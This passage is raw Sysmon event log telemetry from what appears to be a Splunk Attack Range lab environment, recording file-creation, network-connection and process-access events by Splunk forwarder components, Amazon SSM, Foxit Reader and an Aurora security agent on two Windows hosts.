Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B839911CECEC49DF1E4D2BB09BD2348,SHA256=7E8CD5AAE00C08EB75CA7A73FFE5EBE2FF693346FC921B54566ACA334820F98C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016515Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:06.873{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36E31F6FF3D291E339B0DD5D998BD018,SHA256=217B3ED2C8A1007F51C0182E47255A3DD12FA4C118293E5CCFD45B79BC76248D,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000016514Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:03.921{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50096-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8089- 23542300x800000000000000016517Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:07.973{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5D1978EE7E7957650D263D79F3BDBA4,SHA256=232DEED36AEE2D91A5AEBA3C441C2C87B79EAE15C8F91DBB3ABB108ECB9995A5,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000016516Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:03.999{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50097-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 354300x800000000000000041857Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:07.643{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56299-false10.0.1.12-8000- 23542300x800000000000000016519Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:09.466{E5A8D418-DC44-63C7-1B00-00000000B002}1944NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0027b8f3633f25268\channels\health\respondent-20230118114719-033MD5=2BA10D7196373860DD67B47CDBC7ACF2,SHA256=36B87809E8BE9B960CE5E03B4CEC64D52EF7C46D9877F9C3402AB54869FC5CBA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000016518Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:09.055{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AC68C2486922CC1987A1DBBC860C440,SHA256=530A0AC606B9E247A0CB71E305D0348C77F5B2746CC9E39445DB54F57F37F78C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041858Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:10.766{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B75367765BE96F0D3820A2195709BA31,SHA256=91226C3C2ADFC7CB6D1755F6E682523CFAB0C6828EF797B3C0022B7A458EF020,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016521Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:10.469{E5A8D418-DC44-63C7-1B00-00000000B002}1944NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0027b8f3633f25268\channels\health\surveyor-20230118114717-034MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000016520Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:10.142{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=932CCD64DE5B3001F058906680F39E3E,SHA256=0AB6B3C95DBEEEE254B9A1A327AE6B75339F29D937DCEB3F4B71D36C6C3560BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041886Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:11.994{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=E51F614235CB24B8C9A3AC94158D1FCC,SHA256=271F684725282DE13CEB323E8DFD7045FE8508FBA7B63FF770096A1350AE7AFE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000041885Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:11.993{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\ADMINI~1\AppData\Local\Temp\etilqs_CfshVARjVJrnm16MD5=5E08967B6F0D6D50AA1E43332CE8FA46,SHA256=90F8BC0D7AAF7F3295D7A25E5A324B274C472D29D2A4F679C01FE31FF578C945,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000041884Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:11.982{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=3E3003E616BDDE4A046D0BEC74C47322,SHA256=17F51BD1061A150C668D7B0DEEEE1B12D0456B8AB315026D1024C27AC4608763,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000041883Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:11.868{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\system32\dns.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041882Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:11.866{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2400-00000000AF02}2492C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041881Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:11.859{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041880Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:11.859{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2200-00000000AF02}2476C:\Windows\System32\ismserv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041879Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:11.856{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 23542300x800000000000000041878Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:11.850{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D8F10C89EF2CC224958D64D626605F7,SHA256=8A94A520CCC954E90676FD9F2C78895C9E5AF17484FC7B33526DCE625C0504E0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000041877Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:11.844{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041876Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:11.839{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041875Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:11.831{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1E00-00000000AF02}2352C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041874Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:11.828{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9FF-63C7-1C00-00000000AF02}2208C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041873Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:11.828{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F6-63C7-1A00-00000000AF02}1436C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041872Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:11.827{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1700-00000000AF02}1412C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041871Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:11.801{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041870Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:11.795{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041869Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:11.791{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1400-00000000AF02}1060C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041868Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:11.778{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041867Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:11.771{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1200-00000000AF02}756C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 354300x800000000000000016523Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:09.959{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50098-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000016522Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:11.222{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B75FFF63D4CBB6A0D358B7D1E3BE1E6B,SHA256=44CE339ECB65C165A2A0303A0BA23BE4AF4D882AF9EC337548AE8C6ACC8BC9D6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000041866Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:11.764{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1100-00000000AF02}492C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041865Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:11.757{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041864Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:11.747{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0F00-00000000AF02}304C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041863Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:11.741{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0E00-00000000AF02}1004C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041862Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:11.733{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041861Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:11.726{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program 